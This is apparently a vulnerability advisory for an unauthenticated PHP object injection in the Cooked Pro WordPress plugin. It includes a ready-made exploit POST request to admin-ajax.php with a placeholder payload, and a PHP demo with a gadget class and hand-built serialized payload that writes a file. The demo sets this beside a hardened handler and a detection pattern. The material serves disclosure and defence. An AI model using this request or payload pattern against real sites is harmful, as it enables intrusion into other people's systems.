wpexploit | Marcin Motwicki | WPEX-ID: C969C4BC-82D7-46A0-88BA-E056C0B27DE7
History: Nov 21, 2022 - 12:00 a.m.

Cooked Pro < 1.7.5.7 - Unauthenticated PHP Object Injection

2022-11-21 00:00:00
Marcin Motwicki
php object injection
cooked pro
unauthenticated access
security vulnerability
web exploit

EPSS: 0.004 (Low)
EPSS percentile: 74.0%

The plugin does not validate or sanitize the recipe_args parameter before passing it to unserialize() in the cooked_loadmore AJAX action. The action is exposed through admin-ajax.php and does not require a logged-in user, so an unauthenticated attacker can supply an arbitrary serialized PHP object and trigger a PHP Object Injection. What the injection achieves on a given site (file write, code execution, or nothing beyond instantiating an object) depends on which classes with exploitable magic methods (__wakeup, __destruct, __toString) are loaded by the site's other plugins and themes.

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 769
Connection: close

action=cooked_loadmore&atts%5Bcategory%5D=false&atts%5Border%5D=false&atts%5Borderby%5D=false&atts%5Bshow%5D=false&atts%5Bsearch%5D=true&atts%5Bpagination%5D=true&atts%5Bcolumns%5D=3&atts%5Blayout%5D=modern&atts%5Bauthor%5D=&atts%5Bcompact%5D=false&atts%5Bhide_browse%5D=false&atts%5Bhide_sorting%5D=false&atts%5Bexclude%5D=false&atts%5Binline_browse%5D=false&atts%5Bcuisine%5D=false&atts%5Bcooking-method%5D=false&atts%5Btag%5D=false&recipe_args=<SERIALIZED_PHP_OBJECT>&page=1&is_own_profile=
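The following PHP is an added illustration, not code from the Cooked Pro plugin or from the advisory's author. It contrasts the vulnerable pattern described above (user input passed straight to unserialize()) with a hardened handler, and shows why the single POST above is enough: a gadget class's __destruct runs as soon as the deserialized object is released. EvilLogger, the two handler functions, the temp-file path and the serialized payload are all hypothetical or constructed for the demo; the real plugin's gadget chain, if any, depends on what else is loaded on the target site.

```php
<?php
declare(strict_types=1);

// Added illustration, not code from the Cooked Pro plugin. EvilLogger and the
// two handler functions are hypothetical stand-ins: the first for a gadget class
// reachable through the site's autoloader, the other two for the cooked_loadmore
// handler before and after hardening. The file path and payload are constructed.

// Hypothetical gadget: a class whose magic method has a side effect. __destruct
// runs as soon as the object produced by unserialize() is released, so the
// attacker needs nothing beyond the single POST request.
class EvilLogger
{
    public string $path = '';
    public string $data = '';

    public function __destruct()
    {
        if ($this->path !== '') {
            file_put_contents($this->path, $this->data); // attacker-controlled write
        }
    }
}

// Vulnerable pattern: the request parameter goes straight into unserialize(),
// so any class in scope can be instantiated with attacker-chosen properties.
function cooked_loadmore_vulnerable(array $post): array
{
    $args = unserialize($post['recipe_args']); // no class restriction
    return is_array($args) ? $args : [];
}

// Hardened pattern. allowed_classes => false (PHP >= 7.0) makes unserialize()
// return __PHP_Incomplete_Class instead of real objects, so no magic method can
// run; the result is then required to be a plain array of scalars, which is
// all a bag of query arguments ever needs to be.
function cooked_loadmore_hardened(array $post): array
{
    $raw = $post['recipe_args'] ?? '';
    if (!is_string($raw) || $raw === '' || strlen($raw) > 4096) {
        return [];
    }
    $args = @unserialize($raw, ['allowed_classes' => false]); // @: malformed input raises a notice
    if (!is_array($args)) {
        return [];
    }
    $onlyScalars = static function (array $a) use (&$onlyScalars): bool {
        foreach ($a as $v) {
            if (is_array($v)) {
                if (!$onlyScalars($v)) {
                    return false;
                }
            } elseif ($v !== null && !is_scalar($v)) {
                return false; // objects (incomplete or not) are refused
            }
        }
        return true;
    };
    return $onlyScalars($args) ? $args : [];
}

// Constructed payload: a hand-built serialized EvilLogger, as it would appear in
// the recipe_args field after URL-decoding ("EvilLogger" is 10 bytes).
$target  = sys_get_temp_dir() . '/poi_demo.txt';
$payload = 'O:10:"EvilLogger":2:{s:4:"path";s:' . strlen($target) . ':"' . $target
         . '";s:4:"data";s:5:"pwned";}';
$attack  = ['action' => 'cooked_loadmore', 'recipe_args' => $payload, 'page' => '1'];
$benign  = ['action' => 'cooked_loadmore',
            'recipe_args' => serialize(['posts_per_page' => 12, 'paged' => 2]), 'page' => '2'];

@unlink($target);
cooked_loadmore_vulnerable($attack);
printf("vulnerable: %s\n", file_exists($target) ? "gadget fired, wrote $target" : 'no effect');

@unlink($target);
$r = cooked_loadmore_hardened($attack);
printf("hardened (attack): %s, returned %s\n",
       file_exists($target) ? 'gadget fired' : 'no effect', json_encode($r));
printf("hardened (benign): returned %s\n", json_encode(cooked_loadmore_hardened($benign)));
```

Run with `php poi_demo.php`: the vulnerable handler writes the temp file even though it never touches the returned object, while the hardened handler returns an empty array for the attack payload and the original array for the benign one. If the handler really only needs a handful of query arguments, not unserializing at all (accept the individual fields, or use json_decode() with assoc=true) is simpler than constraining unserialize(). For detection, a request to admin-ajax.php with action=cooked_loadmore whose recipe_args value, after URL-decoding, starts with `O:<digits>:"` carries a serialized object rather than the array the feature expects.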

